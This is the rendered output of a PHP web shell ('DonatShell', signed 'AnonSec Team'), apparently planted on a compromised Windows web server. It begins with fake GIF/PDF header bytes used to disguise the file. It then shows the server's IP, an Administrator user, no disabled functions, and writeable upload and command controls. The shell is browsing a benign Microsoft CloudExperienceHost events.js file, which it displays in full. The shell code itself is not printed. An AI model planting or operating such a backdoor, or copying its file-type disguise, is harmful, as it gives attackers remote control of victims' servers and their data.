GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Windows/SystemApps/Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Windows/SystemApps/Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy/js/events.js
//
// Copyright (C) Microsoft. All rights reserved.
//
/// <disable>JS2085.EnableStrictMode</disable>
"use strict";
var CloudExperienceHost;
(function (CloudExperienceHost) {
    //
    // Value for CloudExperienceHost.done event
    //
    class AppResult {
        static doesResultAllowExit(result) {
            // Allow AppResult.success to exit CXH, enabling re-use of online pages as the last node of the CXH flow - such as retail demo setup with a manual MSA
            return (result == AppResult.exitCxhFailure) || (result == AppResult.exitCxhSuccess) || (result == AppResult.success) || (result == AppResult.cancel);
        }
        static getExternalAppResult(result) {
            switch (result) {
                case AppResult.exitCxhFailure:
                    return AppResult.fail;
                case AppResult.exitCxhSuccess:
                    return AppResult.success;
                default:
                    return result;
            }
        }
    }
    AppResult.success = "success";
    AppResult.fail = "fail";
    AppResult.cancel = "cancel";
    AppResult.abort = "abort";
    AppResult.offline = "offline";
    AppResult.preloadSkip = "preloadSkip";
    AppResult.action1 = "action1";
    AppResult.action2 = "action2";
    AppResult.action3 = "action3";
    // Special results enabling exit of the application, only allowed if blockEarlyExit is set in the navmesh and the node has 'canExitCxh' set
    AppResult.exitCxhFailure = "exitCxhFailure";
    AppResult.exitCxhSuccess = "exitCxhSuccess";
    // The error event type is to be used only for inclusive flows
    AppResult.error = "error";
    CloudExperienceHost.AppResult = AppResult;
    //
    // Internal AppResults not intended to be manually fired by webapps using CloudExperienceHost.done
    // If a webapp fires one of these events, the behavior will be the same as if an unrecognized AppResult was fired (we'll navigate to failID)
    //
    class InternalAppResult {
    }
    InternalAppResult.back = "back";
    InternalAppResult.navigateWithBackstack = "navigateWithBackstack";
    CloudExperienceHost.InternalAppResult = InternalAppResult;
    //
    // Value for CloudExperienceHost.loadIdentityProvider event
    //
    class SignInIdentityProviders {
    }
    SignInIdentityProviders.Local = "CXH.IDPS.Local";
    SignInIdentityProviders.MSA = "CXH.IDPS.MSA";
    SignInIdentityProviders.AAD = "CXH.IDPS.AAD";
    CloudExperienceHost.SignInIdentityProviders = SignInIdentityProviders;
    class Events {
    }
    Events.navigate = "CloudExperienceHost.navigate";
    Events.visible = "CloudExperienceHost.visible";
    Events.goBack = "CloudExperienceHost.goBack";
    Events.retryApp = "CloudExperienceHost.retryApp";
    Events.skipApp = "CloudExperienceHost.skipApp";
    Events.done = "CloudExperienceHost.done";
    Events.showEaseOfAccessControl = "CloudExperienceHost.showEaseOfAccessControl";
    Events.languageChange = "CloudExperienceHost.languageChange";
    Events.resetFooterFocus = "CloudExperienceHost.resetFooterFocus";
    Events.inputSwitchIndicatorChange = "CloudExperienceHost.inputSwitchIndicatorChange";
    Events.loadIdentityProvider = "CloudExperienceHost.loadIdentityProvider";
    Events.postTicketToReturnUrl = "CloudExperienceHost.postTicketToReturnUrl";
    Events.postDeviceTicketToUrl = "CloudExperienceHost.postDeviceTicketToUrl";
    Events.postSharedAccountRegistrationTicketsToUrl = "CloudExperienceHost.postSharedAccountRegistrationsTicketsToUrl";
    Events.registerNGCForUser = "CloudExperienceHost.registerNgcForUser";
    Events.resetNGCForUser = "CloudExperienceHost.resetNgcForUser";
    Events.backButtonClicked = "CloudExperienceHost.backButtonClicked";
    Events.showProgressWhenPageIsBusy = "CloudExperienceHost.showProgressWhenPageIsBusy";
    Events.unhandledException = "CloudExperienceHost.unhandledException";
    Events.reportTargetedContentInteraction = "CloudExperienceHost.reportTargetedContentInteraction";
    Events.windowsUpdateStatus = "CloudExperienceHost.ExpeditedUpdate.windowsUpdateStatus";
    CloudExperienceHost.Events = Events;
})(CloudExperienceHost || (CloudExperienceHost = {}));
// Expose events and appresult to be loaded by requirejs
if ((typeof define === "function") && define.amd) {
    define(function () {
        return { Events: CloudExperienceHost.Events, AppResult: CloudExperienceHost.AppResult };
    });
}
//# sourceMappingURL=events.js.map

Anon7 - 2022
AnonSec Team